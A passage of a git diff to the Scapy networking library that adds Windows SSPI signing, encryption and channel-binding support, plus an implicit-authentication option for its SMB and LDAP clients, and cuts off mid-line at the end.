b/doc/scapy/layers/gssapi.rst index d405d6f8ff6..6322d2750c5 100644 --- a/doc/scapy/layers/gssapi.rst +++ b/doc/scapy/layers/gssapi.rst @@ -141,7 +141,7 @@ WinSSP ~~~~~~ WinSSP is a special SSP that is only available on Windows, which calls the actual Windows SSPs local to the machine it's running on. -It allows to use the implicit authentication of the logged-in user with Scapy and its various clients, and is also improves support of loopback connections. +It allows to use the implicit authentication of the logged-in user with Scapy and its various clients, and is also sometimes necessary if you get unexpected ACCESS_DENIED on loopback connections. For instance using SPNEGO: diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index a2cfe35ee42..f27577da5fd 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -76,9 +76,9 @@ This section tries to give many usage examples, but isn't exhaustive. For more d >>> load_module("ticketer") >>> t = Ticketer() >>> # If P12: - >>> t.request_tgt("Administrator@DOMAIN.LOCAL", p12="admin.pfx", ca="ca.pem") + >>> t.request_tgt(p12="admin.pfx", realm="DOMAIN.LOCAL", ca="ca.pem") >>> # One could also have used a different cert and key file: - >>> t.request_tgt("Administrator@DOMAIN.LOCAL", x509="admin.cert", x509key="admin.key", ca="ca.pem") + >>> t.request_tgt(x509="admin.cert", x509key="admin.key", realm="DOMAIN.LOCAL", ca="ca.pem") - **Request a user TGT with Kerberos armoring (FAST)** diff --git a/scapy/arch/windows/sspi.py b/scapy/arch/windows/sspi.py index 8d50a0532f9..8567d534d80 100644 --- a/scapy/arch/windows/sspi.py +++ b/scapy/arch/windows/sspi.py @@ -17,6 +17,7 @@ GSS_C_NO_CHANNEL_BINDINGS, GssChannelBindings, GSSAPI_BLOB, + GSSAPI_BLOB_SIGNATURE, SSP, GSS_S_BAD_NAME, GSS_S_COMPLETE, @@ -31,6 +32,7 @@ # Typing imports from typing import ( Optional, + List, ) # Windows bindings @@ -39,6 +41,7 @@ SECPKG_CRED_OUTBOUND = 0x00000002 SECPKG_CRED_BOTH = 0x00000003 +SECPKG_ATTR_SIZES = 0 SECPKG_ATTR_SESSION_KEY = 9 SECPKG_ATTR_SERVER_FLAGS = 14 @@ -56,6 +59,70 @@ class SecPkgContext_Flags(ctypes.Structure): ] +class SecPkgContext_Sizes(ctypes.Structure): + _fields_ = [ + ("cbMaxToken", ctypes.wintypes.ULONG), + ("cbMaxSignature", ctypes.wintypes.ULONG), + ("cbBlockSize", ctypes.wintypes.ULONG), + ("cbSecurityTrailer", ctypes.wintypes.ULONG), + ] + + +class SEC_CHANNEL_BINDINGS(ctypes.Structure): + _fields_ = [ + ("dwInitiatorAddrType", ctypes.wintypes.ULONG), + ("cbInitiatorLength", ctypes.wintypes.ULONG), + ("dwInitiatorOffset", ctypes.wintypes.ULONG), + ("dwAcceptorAddrType", ctypes.wintypes.ULONG), + ("cbAcceptorLength", ctypes.wintypes.ULONG), + ("dwAcceptorOffset", ctypes.wintypes.ULONG), + ("cbApplicationDataLength", ctypes.wintypes.ULONG), + ("dwApplicationDataOffset", ctypes.wintypes.ULONG), + ] + + @classmethod + def from_GSS(cls, bindings: GssChannelBindings): + """ + Convert a GssChannelBindings to SecPkgContext_Bindings + """ + # Initialize structure + buffer = ctypes.create_string_buffer( + ctypes.sizeof(SEC_CHANNEL_BINDINGS) + + len(bindings.initiator_address.value) + + len(bindings.acceptor_address.value) + + len(bindings.application_data.value) + ) + Bindings = ctypes.cast( + ctypes.byref(buffer), + ctypes.POINTER(SEC_CHANNEL_BINDINGS), + ) + + # Populate values with the offsets and lengths + offset = ctypes.sizeof(SEC_CHANNEL_BINDINGS) + Bindings.contents.dwInitiatorAddrType = bindings.initiator_addrtype + if bindings.initiator_address.value: + lgth = len(bindings.initiator_address.value) + Bindings.contents.cbInitiatorLength = lgth + Bindings.contents.dwInitiatorOffset = offset + buffer[offset : offset + lgth] = bindings.initiator_address.value + offset += lgth + Bindings.contents.dwAcceptorAddrType = bindings.acceptor_addrtype + if bindings.acceptor_address.value: + lgth = len(bindings.acceptor_address.value) + Bindings.contents.cbAcceptorLength = lgth + Bindings.contents.dwAcceptorOffset = offset + buffer[offset : offset + lgth] = bindings.acceptor_address.value + offset += lgth + if bindings.application_data.value: + lgth = len(bindings.application_data.value) + Bindings.contents.cbApplicationDataLength = lgth + Bindings.contents.dwApplicationDataOffset = offset + buffer[offset : offset + lgth] = bindings.application_data.value + offset += lgth + + return buffer, offset + + SECURITY_NETWORK_DREP = 0 @@ -139,9 +206,20 @@ class SecBuffer(ctypes.Structure): ("pvBuffer", ctypes.c_void_p), ] + def GetData(self): + if self.cbBuffer == 0: + return b"" + buf = ctypes.cast( + self.pvBuffer, + ctypes.POINTER(ctypes.wintypes.BYTE * self.cbBuffer), + ) + return bytes(buf.contents) + SECBUFFER_VERSION = 0 +SECBUFFER_DATA = 1 SECBUFFER_TOKEN = 2 +SECBUFFER_READONLY = 0x80000000 SECBUFFER_CHANNEL_BINDINGS = 14 @@ -152,6 +230,25 @@ class SecBufferDesc(ctypes.Structure): ("pBuffers", ctypes.POINTER(ctypes.POINTER(SecBuffer))), ] + @staticmethod + def Create(Buffers: List[SecBuffer]): + Buffers = ctypes.ARRAY(SecBuffer, len(Buffers))(*Buffers) + Output = SecBufferDesc( + SECBUFFER_VERSION, + len(Buffers), + ctypes.cast( + ctypes.byref(Buffers), ctypes.POINTER(ctypes.POINTER(SecBuffer)) + ), + ) + return Buffers, Output + + @staticmethod + def ParseBuffer(Buffers: ctypes.ARRAY, BufferType: int, cls): + for Buffer in Buffers: + if Buffer.BufferType == BufferType: + return cls(Buffer.GetData()) + return None + _winapi_InitializeSecurityContext = ctypes.windll.secur32.InitializeSecurityContextW _winapi_InitializeSecurityContext.restype = ctypes.wintypes.DWORD @@ -184,6 +281,51 @@ class SecBufferDesc(ctypes.Structure): ctypes.POINTER(SECURITY_INTEGER), # ptsExpiry ] +_winapi_MakeSignature = ctypes.windll.secur32.MakeSignature +_winapi_MakeSignature.restype = ctypes.wintypes.DWORD +_winapi_MakeSignature.argtypes = [ + ctypes.POINTER(SecHandle), # phContext + ctypes.wintypes.ULONG, # fQOP + ctypes.POINTER(SecBufferDesc), # pMessage + ctypes.wintypes.ULONG, # MessageSeqNo +] + +_winapi_VerifySignature = ctypes.windll.secur32.VerifySignature +_winapi_VerifySignature.restype = ctypes.wintypes.DWORD +_winapi_VerifySignature.argtypes = [ + ctypes.POINTER(SecHandle), # phContext + ctypes.POINTER(SecBufferDesc), # pMessage + ctypes.wintypes.ULONG, # MessageSeqNo + ctypes.POINTER(ctypes.wintypes.ULONG), # pfQOP +] + +_winapi_DecryptMessage = ctypes.windll.secur32.DecryptMessage +_winapi_DecryptMessage.restype = ctypes.wintypes.DWORD +_winapi_DecryptMessage.argtypes = [ + ctypes.POINTER(SecHandle), # phContext + ctypes.POINTER(SecBufferDesc), # pMessage + ctypes.wintypes.ULONG, # MessageSeqNo + ctypes.POINTER(ctypes.wintypes.ULONG), # pfQOP +] + +_winapi_EncryptMessage = ctypes.windll.secur32.EncryptMessage +_winapi_EncryptMessage.restype = ctypes.wintypes.DWORD +_winapi_EncryptMessage.argtypes = [ + ctypes.POINTER(SecHandle), # phContext + ctypes.wintypes.ULONG, # fQOP + ctypes.POINTER(SecBufferDesc), # pMessage + ctypes.wintypes.ULONG, # MessageSeqNo +] + +_winapi_DecryptMessage = ctypes.windll.secur32.DecryptMessage +_winapi_DecryptMessage.restype = ctypes.wintypes.DWORD +_winapi_DecryptMessage.argtypes = [ + ctypes.POINTER(SecHandle), # phContext + ctypes.POINTER(SecBufferDesc), # pMessage + ctypes.wintypes.ULONG, # MessageSeqNo + ctypes.POINTER(ctypes.wintypes.ULONG), # pfQOP +] + _winapi_FreeContextBuffer = ctypes.windll.secur32.FreeContextBuffer _winapi_FreeContextBuffer.restype = ctypes.wintypes.DWORD _winapi_FreeContextBuffer.argtypes = [ctypes.c_void_p] @@ -368,6 +510,10 @@ class CONTEXT(SSP.CONTEXT): "ptsExpiry", "SessionKey", "ServerHostname", + "SendSeqNum", + "RecvSeqNum", + "cbMaxSignature", + "cbSecurityTrailer", ] def __init__( @@ -437,11 +583,34 @@ def QueryNegotiatedFlags(self): self.flags = ISC_REQ_FLAGS.to_GSS(Buffer.Flags) + def QueryPkgContextSizes(self): + """ + Query the package context sizes + """ + Buffer = SecPkgContext_Sizes() + + status = _winapi_QueryContextAttributesW( + self.phContext, + SECPKG_ATTR_SIZES, + ctypes.byref(Buffer), + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"QueryContextAttributesW failed with: {hex(status)}") + + self.cbMaxSignature = Buffer.cbMaxSignature + self.cbSecurityTrailer = Buffer.cbSecurityTrailer + def __repr__(self): return "[Native SSP: %s]" % self.Package def __init__(self, Package: str = "Negotiate"): self.Package = Package + if self.Package == "Negotiate": + self.auth_type = 0x09 + elif self.Package == "NTLM": + self.auth_type = 0x0A + elif self.Package == "Kerberos": + self.auth_type = 0x10 super(WinSSP, self).__init__() def GSS_Init_sec_context( @@ -479,23 +648,22 @@ def GSS_Init_sec_context( ) ) if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS: - raise NotImplementedError("Channel bindings !") - if InputBuffers: - InputBuffers = ctypes.ARRAY(SecBuffer, len(InputBuffers))(*InputBuffers) - Input = SecBufferDesc( - SECBUFFER_VERSION, - len(InputBuffers), - ctypes.cast( - ctypes.byref(InputBuffers), - ctypes.POINTER(ctypes.POINTER(SecBuffer)), - ), + chan_bindings, lgth = SEC_CHANNEL_BINDINGS.from_GSS(chan_bindings) + InputBuffers.append( + SecBuffer( + lgth, + SECBUFFER_CHANNEL_BINDINGS, + ctypes.cast(chan_bindings, ctypes.c_void_p), + ) ) + if InputBuffers: + InputBuffers, Input = SecBufferDesc.Create(InputBuffers) else: Input = None # Create the output buffers (empty for now) - OutputBuffers = ctypes.ARRAY(SecBuffer, 1)( - *[ + OutputBuffers, Output = SecBufferDesc.Create( + [ SecBuffer( ctypes.wintypes.ULONG(0), ctypes.wintypes.ULONG(SECBUFFER_TOKEN), @@ -503,13 +671,6 @@ def GSS_Init_sec_context( ) ] ) - Output = SecBufferDesc( - SECBUFFER_VERSION, - len(OutputBuffers), - ctypes.cast( - ctypes.byref(OutputBuffers), ctypes.POINTER(ctypes.POINTER(SecBuffer)) - ), - ) # Prepare other arguments phNewContext = Context.phContext or SecHandle() @@ -556,22 +717,16 @@ def GSS_Init_sec_context( if Context.phContext is None: Context.phContext = phNewContext - for OutputBuffer in OutputBuffers: - if ( - OutputBuffer.BufferType == SECBUFFER_TOKEN - and OutputBuffer.cbBuffer != 0 - ): - buf = ctypes.cast( - OutputBuffer.pvBuffer, - ctypes.POINTER(ctypes.wintypes.BYTE * OutputBuffer.cbBuffer), - ) - output_token = GSSAPI_BLOB(bytes(buf.contents)) - break + # Extract output token + output_token = SecBufferDesc.ParseBuffer( + OutputBuffers, SECBUFFER_TOKEN, GSSAPI_BLOB + ) # If we succeeded, query the session key if status in [SEC_CODES.SEC_E_OK, SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE]: Context.QuerySessionKey() Context.QueryNegotiatedFlags() + Context.QueryPkgContextSizes() Context.state = self.STATE.COMPLETED # Free things we did not create (won't be freed by GC) @@ -610,23 +765,22 @@ def GSS_Accept_sec_context( ) ) if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS: - raise NotImplementedError("Channel bindings !") - if InputBuffers: - InputBuffers = ctypes.ARRAY(SecBuffer, len(InputBuffers))(*InputBuffers) - Input = SecBufferDesc( - SECBUFFER_VERSION, - len(InputBuffers), - ctypes.cast( - ctypes.byref(InputBuffers), - ctypes.POINTER(ctypes.POINTER(SecBuffer)), - ), + chan_bindings, lgth = SEC_CHANNEL_BINDINGS.from_GSS(chan_bindings) + InputBuffers.append( + SecBuffer( + lgth, + SECBUFFER_CHANNEL_BINDINGS, + ctypes.cast(chan_bindings, ctypes.c_void_p), + ) ) + if InputBuffers: + InputBuffers, Input = SecBufferDesc.Create(InputBuffers) else: Input = None # Create the output buffers (empty for now) - OutputBuffers = ctypes.ARRAY(SecBuffer, 1)( - *[ + OutputBuffers, Output = SecBufferDesc.Create( + [ SecBuffer( ctypes.wintypes.ULONG(0), ctypes.wintypes.ULONG(SECBUFFER_TOKEN), @@ -634,13 +788,6 @@ def GSS_Accept_sec_context( ) ] ) - Output = SecBufferDesc( - SECBUFFER_VERSION, - len(OutputBuffers), - ctypes.cast( - ctypes.byref(OutputBuffers), ctypes.POINTER(ctypes.POINTER(SecBuffer)) - ), - ) # Prepare other arguments phNewContext = Context.phContext or SecHandle() @@ -670,22 +817,16 @@ def GSS_Accept_sec_context( if Context.phContext is None: Context.phContext = phNewContext - for OutputBuffer in OutputBuffers: - if ( - OutputBuffer.BufferType == SECBUFFER_TOKEN - and OutputBuffer.cbBuffer != 0 - ): - buf = ctypes.cast( - OutputBuffer.pvBuffer, - ctypes.POINTER(ctypes.wintypes.BYTE * OutputBuffer.cbBuffer), - ) - output_token = GSSAPI_BLOB(bytes(buf.contents)) - break + # Extract output token + output_token = SecBufferDesc.ParseBuffer( + OutputBuffers, SECBUFFER_TOKEN, GSSAPI_BLOB + ) # If we succeeded, query the session key if status in [SEC_CODES.SEC_E_OK, SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE]: Context.QuerySessionKey() Context.QueryNegotiatedFlags() + Context.QueryPkgContextSizes() Context.state = self.STATE.COMPLETED # Free things we did not create (won't be freed by GC) @@ -694,3 +835,166 @@ def GSS_Accept_sec_context( _winapi_FreeContextBuffer(OutputBuffer.pvBuffer) return Context, output_token, SEC_CODES.to_GSS(status) + + def LegsAmount(self, Context: CONTEXT): + if self.Package == "NTLM": + return 3 + else: + return 2 + + def MaximumSignatureLength(self, Context: CONTEXT): + return Context.cbMaxSignature + + def GSS_GetMICEx(self, Context, msgs, qop_req=0): + MessageBuffers, Message = SecBufferDesc.Create( + [ + SecBuffer( + ctypes.wintypes.ULONG(len(x.data)), + ctypes.wintypes.ULONG(SECBUFFER_DATA | SECBUFFER_READONLY), + ctypes.cast(ctypes.create_string_buffer(x.data), ctypes.c_void_p), + ) + for x in msgs + if x.sign + ] + + [ + SecBuffer( + ctypes.wintypes.ULONG(Context.cbMaxSignature), + ctypes.wintypes.ULONG(SECBUFFER_TOKEN), + ctypes.cast( + ctypes.create_string_buffer(Context.cbMaxSignature), + ctypes.c_void_p, + ), + ) + ] + ) + # Call MakeSignature + status = _winapi_MakeSignature( + Context.phContext, + ctypes.wintypes.ULONG(qop_req), + ctypes.byref(Message), + 0, + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"MakeSignature failed with: {hex(status)}") + # Extract output token + sig = SecBufferDesc.ParseBuffer( + MessageBuffers, SECBUFFER_TOKEN, GSSAPI_BLOB_SIGNATURE + ) + return sig + + def GSS_VerifyMICEx(self, Context, msgs, signature): + fQOP = ctypes.wintypes.ULONG(0) + MessageBuffers, Message = SecBufferDesc.Create( + [ + SecBuffer( + ctypes.wintypes.ULONG(len(x.data)), + ctypes.wintypes.ULONG(SECBUFFER_DATA | SECBUFFER_READONLY), + ctypes.cast(ctypes.create_string_buffer(x.data), ctypes.c_void_p), + ) + for x in msgs + if x.sign + ] + + [ + SecBuffer( + ctypes.wintypes.ULONG(len(signature)), + ctypes.wintypes.ULONG(SECBUFFER_TOKEN), + ctypes.cast( + ctypes.create_string_buffer(bytes(signature)), ctypes.c_void_p + ), + ) + ] + ) + # Call VerifySignature + status = _winapi_VerifySignature( + Context.phContext, + ctypes.byref(Message), + 0, + ctypes.byref(fQOP), + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"VerifySignature failed with: {hex(status)}") + + def GSS_WrapEx(self, Context, msgs, qop_req=0): + MessageBuffers, Message = SecBufferDesc.Create( + [ + SecBuffer( + ctypes.wintypes.ULONG(len(x.data)), + ctypes.wintypes.ULONG( + SECBUFFER_DATA + | (SECBUFFER_READONLY if not x.conf_req_flag else 0) + ), + ctypes.cast(ctypes.create_string_buffer(x.data), ctypes.c_void_p), + ) + for x in msgs + if x.sign + ] + + [ + SecBuffer( + ctypes.wintypes.ULONG(Context.cbSecurityTrailer), + ctypes.wintypes.ULONG(SECBUFFER_TOKEN), + ctypes.cast( + ctypes.create_string_buffer(Context.cbSecurityTrailer), + ctypes.c_void_p, + ), + ) + ] + ) + # Call EncryptMessage + status = _winapi_EncryptMessage( + Context.phContext, + ctypes.wintypes.ULONG(qop_req), + ctypes.byref(Message), + 0, + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"EncryptMessage failed with: {hex(status)}") + # Update messages + for i in range(len(msgs)): + msgs[i].data = MessageBuffers[i].GetData() + # Extract signature + sig = SecBufferDesc.ParseBuffer( + MessageBuffers, SECBUFFER_TOKEN, GSSAPI_BLOB_SIGNATURE + ) + return ( + msgs, + sig, + ) + + def GSS_UnwrapEx(self, Context, msgs, signature): + fQOP = ctypes.wintypes.ULONG(0) + MessageBuffers, Message = SecBufferDesc.Create( + [ + SecBuffer( + ctypes.wintypes.ULONG(len(x.data)), + ctypes.wintypes.ULONG( + SECBUFFER_DATA + | (SECBUFFER_READONLY if not x.conf_req_flag else 0) + ), + ctypes.cast(ctypes.create_string_buffer(x.data), ctypes.c_void_p), + ) + for x in msgs + if x.sign + ] + + [ + SecBuffer( + ctypes.wintypes.ULONG(len(signature)), + ctypes.wintypes.ULONG(SECBUFFER_TOKEN), + ctypes.cast( + ctypes.create_string_buffer(bytes(signature)), ctypes.c_void_p + ), + ) + ] + ) + # Call DecryptMessage + status = _winapi_DecryptMessage( + Context.phContext, + ctypes.byref(Message), + 0, + ctypes.byref(fQOP), + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"DecryptMessage failed with: {hex(status)}") + # Update messages + for i in range(len(msgs)): + msgs[i].data = MessageBuffers[i].GetData() + return msgs diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index a79b90b9ce8..c8876a4a30d 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -3351,14 +3351,18 @@ def __init__(self, *args, **kwargs): ) super(DceRpcSocket, self).__init__(*args, **kwargs) - def send(self, x, **kwargs): + def send(self, x, is_sr1=False, **kwargs): for pkt in self.session.out_pkt(x): if self.transport == DCERPC_Transport.NCACN_NP: # In this case DceRpcSocket wraps a SMB_RPC_SOCKET, call it directly. - self.ins.send(pkt, **kwargs) + self.ins.send(pkt, is_sr1=is_sr1, **kwargs) else: super(DceRpcSocket, self).send(pkt, **kwargs) + def sr1(self, *args, **kwargs): + # We allow to use IOCTL only when sr1() is used, as we expect an answer. + return super(DceRpcSocket, self).sr1(*args, is_sr1=True, **kwargs) + def recv(self, x=None): pkt = super(DceRpcSocket, self).recv(x) if pkt is not None: diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 047ece69199..d1acbc7ad06 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -61,6 +61,7 @@ from scapy.asn1packet import ASN1_Packet from scapy.config import conf from scapy.compat import StrEnum +from scapy.consts import WINDOWS from scapy.error import log_runtime from scapy.fields import ( FieldLenField, @@ -1718,7 +1719,7 @@ class LDAP_Exception(RuntimeError): def __init__(self, *args, **kwargs): resp = kwargs.pop("resp", None) if resp: - self.resultCode = resp.protocolOp.resultCode + self.resultCode = resp.protocolOp.sprintf("%resultCode%") self.diagnosticMessage = resp.protocolOp.diagnosticMessage.val.rstrip( b"\x00" ).decode(errors="backslashreplace") @@ -2013,7 +2014,17 @@ def bind( from scapy.layers.spnego import SPNEGOSSP if not isinstance(self.ssp, SPNEGOSSP): - raise ValueError("Only SPNEGOSSP is supported with SASL_GSS_SPNEGO !") + if WINDOWS: + from scapy.arch.windows.sspi import WinSSP + + if not isinstance(self.ssp, WinSSP): + raise ValueError( + "Only SPNEGOSSP is supported with SASL_GSS_SPNEGO !" + ) + else: + raise ValueError( + "Only SPNEGOSSP is supported with SASL_GSS_SPNEGO !" + ) elif mech == LDAP_BIND_MECHS.SICILY: from scapy.layers.ntlm import NTLMSSP @@ -2136,7 +2147,8 @@ def bind( ) if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: raise RuntimeError( - "%s: GSS_Init_sec_context failed !" % self.mech.name, + "%s: GSS_Init_sec_context failed with %s !" + % (self.mech.name, repr(status)), ) while token: resp = self.sr1( @@ -2154,9 +2166,11 @@ def bind( resp=resp, ) val = resp.protocolOp.serverSaslCredsData - if not val: - status = resp.protocolOp.resultCode - break + if resp.protocolOp.resultCode not in [0, 14]: + raise LDAP_Exception( + "SASL authentication failed !", + resp=resp, + ) self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, input_token=GSSAPI_BLOB(val), @@ -2166,9 +2180,9 @@ def bind( else: status = GSS_S_COMPLETE if status != GSS_S_COMPLETE: - raise LDAP_Exception( - "%s bind failed !" % self.mech.name, - resp=resp, + raise RuntimeError( + "%s: GSS_Init_sec_context failed with %s !" + % (self.mech.name, repr(status)), ) elif self.mech == LDAP_BIND_MECHS.SASL_GSSAPI: # GSSAPI has 2 extra exchanges diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 5f40ddec50e..4445de58f8c 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -239,16 +239,27 @@ def connect( ) if self.transport == DCERPC_Transport.NCACN_NP: # SMB + if self.auth_level >= DCE_C_AUTHN_LEVEL.PKT_PRIVACY: + smb_kwargs.setdefault("REQUIRE_ENCRYPTION", True) + elif self.auth_level >= DCE_C_AUTHN_LEVEL.PKT_INTEGRITY: + smb_kwargs.setdefault("REQUIRE_SIGNATURE", True) + # We pack the socket into a SMB_RPC_SOCKET sock = self.smbrpcsock = SMB_RPC_SOCKET.from_tcpsock( - sock, ssp=self.ssp, **smb_kwargs + sock, + ssp=self.ssp, + **smb_kwargs, ) # If the endpoint is provided, connect to it. if endpoint is not None: self.open_smbpipe(endpoint) - self.sock = DceRpcSocket(sock, DceRpc5, **self.dcesockargs) + self.sock = DceRpcSocket( + sock, + DceRpc5, + **self.dcesockargs, + ) elif self.transport == DCERPC_Transport.NCACN_IP_TCP: self.sock = DceRpcSocket( sock, diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index f2c70b04957..36a3c1fd451 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1035,16 +1035,16 @@ def close_pipe(self): self.close_request(self.PipeFileId) self.PipeFileId = None - def send(self, x): - """ - Internal ObjectPipe function. - """ - # Reminder: this class is an ObjectPipe, it's just a queue. + def send(self, x, is_sr1=True): + # Reminder: this class is an ObjectPipe ! It doesn't act as a real socket + # but just a queue. When someone calls the "send" function, they pipe + # some data that we must send, and tell us if they expect an answer through + # the is_sr1 flag. # Detect if DCE/RPC is fragmented. Then we must use Read/Write is_frag = x.pfc_flags & 3 != 3 - if self.use_ioctl and not is_frag and self.session.Dialect >= 0x0210: + if self.use_ioctl and is_sr1 and not is_frag and self.session.Dialect >= 0x0210: # Use IOCTLRequest pkt = SMB2_IOCTL_Request( FileId=self.PipeFileId, @@ -1057,6 +1057,7 @@ def send(self, x): raise ValueError("Failed reading IOCTL_Response ! %s" % resp.NTStatus) data = bytes(resp.Output) super(SMB_RPC_SOCKET, self).send(data) + # Handle BUFFER_OVERFLOW (big DCE/RPC response) while resp.NTStatus == "STATUS_BUFFER_OVERFLOW" or data[3] & 2 != 2: # Retrieve DCE/RPC full size @@ -1078,9 +1079,15 @@ def send(self, x): resp = self.ins.sr1(pkt, verbose=0) if SMB2_Write_Response not in resp: raise ValueError("Failed sending WriteResponse ! %s" % resp.NTStatus) + + # We may not be expecting an answer + if not is_sr1: + return + # If fragmented, only read if it's the last. if is_frag and not x.pfc_flags.PFC_LAST_FRAG: return + # We send a Read Request afterwards resp = self.ins.sr1( SMB2_Read_Request( @@ -1122,6 +1129,10 @@ class smbclient(CLIUtil): :param HashNt: if provided, used for auth (NTLM) :param HashAes256Sha96: if provided, used for auth (Kerberos) :param HashAes128Sha96: if provided, used for auth (Kerberos) + :param use_krb5ccname: (bool) if true, the KRB5CCNAME environment variable will + be used if available. + :param use_winssp: (bool) (only works on Windows). Use implicit authentication + through WinSSP. :param ST: if provided, the service ticket to use (Kerberos) :param KEY: if provided, the session key associated to the ticket (Kerberos) :param cli: CLI mode (default True). False to use for scripting @@ -1143,6 +1154,7 @@ def __init__( HashAes256Sha96: bytes = None, HashAes128Sha96: bytes = None, use_krb5ccname: bool = False, + use_winssp: bool = False, port: int = 445, timeout: int = 5, debug: int = 0, @@ -1156,7 +1168,9 @@ def __init__( ): if cli: self._depcheck() - assert UPN or ssp or guest, "Either UPN, ssp or guest must be provided !" + assert ( + UPN or ssp or guest or use_winssp + ), "Either UPN, ssp or guest must be provided !" # Do we need to build a SSP? if ssp is None: # Create the SSP (only if not guest mode) @@ -1172,6 +1186,7 @@ def __init__( KEY=KEY, kerberos_required=kerberos_required, use_krb5ccname=use_krb5ccname, + use_winssp=use_winssp, ) else: # Guest mode diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index 9f498711c0c..7073d907295 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -40,6 +40,7 @@ ASN1F_STRING, ) from scapy.asn1packet import ASN1_Packet +from scapy.consts import WINDOWS from scapy.fields import ( FieldListField, LEIntEnumField, @@ -724,10 +725,13 @@ def from_cli_arguments( ccache: str = None, debug: int = 0, use_krb5ccname: bool = False, + use_winssp: bool = False, ): """ Initialize a SPNEGOSSP from a list of many arguments. - This is useful in a CLI, with NTLM and Kerberos supported by default. + + This is useful in a CLI, as it will try to build the best SPNEGOSSP + with NTLM and Kerberos based on the various parameters. :param UPN: the UPN of the user to use. :param target: the target IP/hostname entered by the user. @@ -743,17 +747,27 @@ def from_cli_arguments( :param ccache: (str) if provided, a path to a CCACHE (Kerberos) :param use_krb5ccname: (bool) if true, the KRB5CCNAME environment variable will be used if available. + :param use_winssp: (bool) (only works on Windows). Use implicit authentication + through WinSSP. """ kerberos = True hostname = None # Check if target is a hostname / Check IP - if ":" in target: + if target and ":" in target: if not valid_ip6(target): hostname = target else: if not valid_ip(target): hostname = target + # If using WinSSP, this goes fast. + if use_winssp: + if not WINDOWS: + raise OSError("Cannot use WinSSP on a non-Windows computer !") + from scapy.arch.windows.sspi import WinSSP + + return WinSSP() + # Check UPN try: _, realm = _parse_upn(UPN) diff --git a/scapy/layers/windows/erref.py b/scapy/layers/windows/erref.py index 5909b5d3727..6193eeb613f 100644 --- a/scapy/layers/windows/erref.py +++ b/scapy/layers/windows/erref.py @@ -59,6 +59,7 @@ 0xC0000071: "STATUS_PASSWORD_EXPIRED", 0xC0000072: "STATUS_ACCOUNT_DISABLED", 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", + 0xC00000B0: "STATUS_PIPE_DISCONNECTED", 0xC00000BA: "STATUS_FILE_IS_A_DIRECTORY", 0xC00000BB: "STATUS_NOT_SUPPORTED", 0xC00000C9: "STATUS_NETWORK_NAME_DELETED", diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index 1a43e55ec66..ac739b4a5b1 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -163,9 +163,14 @@ def __init__( HashAes256Sha96: bytes = None, HashAes128Sha96: bytes = None, use_krb5ccname: bool = False, + use_winssp: bool = False, ): self.client = LDAP_Client() - if ssp is None and mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO and UPN and host: + if ( + ssp is None + and mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO + and (UPN and host or use_winssp) + ): # We allow the SSP to be provided through arguments. # In that case, use SPNEGO ssp = SPNEGOSSP.from_cli_arguments( @@ -177,6 +182,7 @@ def __init__( HashAes128Sha96=HashAes128Sha96, kerberos_required=kerberos_required, use_krb5ccname=use_krb5ccname, + use_winssp=use_winssp, ) self.ssp = ssp self.mech = mech @@ -261,6 +267,7 @@ def connect(self): self.client.connect(self.host, port=self.port, use_ssl=self.ssl) except Exception as ex: self.tprint(str(ex)) + self.host = None raise self.tprint("Established connection to %s." % self.host) self.connected = True diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 3b119a1e905..2ab413eb2c7 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -133,7 +133,8 @@ def __init__(self, threaded=True, # type: bool session=None, # type: Optional[_GlobSessionType] chainEX=False, # type: bool - stop_filter=None # type: Optional[Callable[[Packet], bool]] + stop_filter=None, # type: Optional[Callable[[Packet], bool]] + **send_kwargs, # type: Any ): # type: (...) -> None # Instantiate all arguments @@ -162,6 +163,7 @@ def __init__(self, self._flood = _flood self.threaded = threaded self.breakout = Event() + self.send_kwargs = send_kwargs # Instantiate packet holders if prebuild and not self._flood: self.tobesent = list(pkt) # type: _PacketIterable @@ -278,7 +280,7 @@ def _sndrcv_snd(self): # has not been sent self.hsent.setdefault(p.hashret(), []).append(p) # Send packet - self.pks.send(p) + self.pks.send(p, **self.send_kwargs) time.sleep(self.inter) if self.breakout.is_set(): break diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 4cbed484ae5..f724a845fc0 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -523,8 +523,8 @@ def _run_test_timeout(test, get_interactive_session, verb=3, my_globals=None): timeout=5 * 60, # 5 min verb=verb, my_globals=my_globals) - except StopAutorunTimeout: - return "-- Test timed out ! --", False + except StopAutorunTimeout as ex: + return "@@@@@@@@@@@@@@@@@ Test timed out ! 